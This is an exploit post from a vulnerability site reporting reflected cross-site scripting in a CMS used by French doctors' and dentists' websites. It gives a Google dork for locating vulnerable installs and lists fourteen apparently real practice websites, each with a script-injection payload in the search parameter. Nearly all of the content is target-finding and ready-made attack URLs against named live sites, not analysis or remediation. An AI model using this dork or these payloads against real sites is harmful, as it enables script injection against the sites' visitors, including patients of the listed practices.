French doctors cms cross site scripting

Published
Credit
Risk
2017.01.20
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: intext:"Mentions légales" inurl:"recherche.php?recherche="

######################
# Exploit Title : French doctors cms cross site scripting
# Exploit Author : Ashiyane Digital Security Team
# Google Dork : intext:"Mentions légales" inurl:"recherche.php?recherche="
# Date: 01-12-2016
# Tested On : windows 7 /firefox
######################
#http://www.dr-meynier-pascal.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.cabinetborbarriere.com/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-berenguer-christophe.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-salama-jean-pierre.com/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-lamouret-benoit.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-dadoun-hubert.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-pradelle-xavier.chirurgiens-dentistes.fr/recherche.php?recherche=><script>alert(/XSS/)</script>
#http://www.dr-haffani-slim.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-jamous-antoine.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://docteurmaxboukris.com/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.docteurdanan.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-guiss-herve.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.cabinet-carrefour-europe.com/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-soissong-netzer-audrey.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com